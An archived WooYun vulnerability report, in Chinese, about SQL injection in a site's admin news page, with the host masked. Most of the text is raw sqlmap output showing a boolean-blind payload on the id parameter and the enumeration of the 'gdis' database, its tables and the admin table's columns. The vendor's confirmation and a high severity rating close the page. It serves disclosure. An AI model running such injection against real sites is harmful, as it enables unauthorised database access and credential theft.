乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-16: 细节已通知厂商并且等待厂商处理中 2015-09-21: 厂商已经确认,细节仅向厂商公开 2015-10-01: 细节向核心白帽子及相关领域专家公开 2015-10-11: 细节向普通白帽子公开 2015-10-21: 细节向实习白帽子公开 2015-11-05: 细节向公众公开
如题
http://**.**.**.**/admin/newstext.asp?id=524
sqlmap/0.9 - automatic SQL injection and database takeover tool http://**.**.**.**[*] starting at: 14:41:49[14:41:49] [INFO] using 'D:\Python27\sqlmap\output\**.**.**.**\session' as session file[14:41:49] [INFO] resuming injection data from session file[14:41:49] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file[14:41:49] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=524 AND 923=923---[14:41:59] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005[14:41:59] [INFO] fetching database names[14:41:59] [INFO] fetching number of databases[14:41:59] [INFO] read from file 'D:\Python27\sqlmap\output\**.**.**.**\session':[14:41:59] [INFO] read from file 'D:\Python27\sqlmap\output\**.**.**.**\session':[14:41:59] [INFO] retrieved:[14:42:26] [ERROR] unable to retrieve the number of databases[14:42:26] [INFO] falling back to current database[14:42:26] [INFO] fetching current database[14:42:26] [INFO] read from file 'D:\Python27\sqlmap\output\**.**.**.**\session': gdisavailable databases [1]:[*] gdis[14:42:26] [INFO] fetching tables for database 'gdis'[14:42:26] [INFO] fetching number of tables for database 'gdis'[14:42:26] [INFO] retrieved: 9[14:43:32] [INFO] retrieved: dbo.Aclass[14:55:46] [INFO] retrieved: dbo.Aclass_link[15:04:03] [INFO] retrieved: dbo.Aclass_member[15:13:47] [INFO] retrieved: dbo[15:15:07] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request.admin[15:22:32] [INFO] retrieved: dbo.article[15:32:44] [INFO] retrieved: dbo.article_link[15:41:21] [INFO] retrieved: dbo.article_member[15:51:43] [INFO] retrieved: dbo.dtproperties[16:07:28] [INFO] retrieved: dbo.imgDatabase: gdis[9 tables]+--------------------+| dbo.Aclass || dbo.Aclass_link || dbo.Aclass_member || dbo.admin || dbo.article || dbo.article_link || dbo.article_member || dbo.dtproperties || dbo.img |+--------------------+[16:13:32] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\**.**.**.**'[*] shutting down at: 16:13:32
sqlmap/0.9 - automatic SQL injection and database takeover tool http://**.**.**.**[*] starting at: 16:27:36[16:27:36] [INFO] using 'D:\Python27\sqlmap\output\**.**.**.**\session' as session file[16:27:36] [INFO] resuming injection data from session file[16:27:36] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file[16:27:37] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=524 AND 923=923---[16:27:46] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005[16:27:46] [INFO] fetching columns for table 'dbo.admin' on database 'gdis'[16:27:46] [INFO] fetching number of columns for table 'dbo.admin' on database 'gdis'[16:27:46] [INFO] retrieved: 8[16:28:55] [INFO] retrieved: CompanyName[16:42:59] [INFO] retrieved: nvarchar[16:53:10] [INFO] retrieved: flag[16:58:59] [INFO] retrieved: int[17:03:33] [INFO] retrieved: id[17:07:00] [INFO] retrieved: int[17:11:34] [INFO] retrieved: name[17:17:24] [INFO] retrieved: nvarchar[17:27:51] [INFO] retrieved: pa
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-09-21 10:03
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无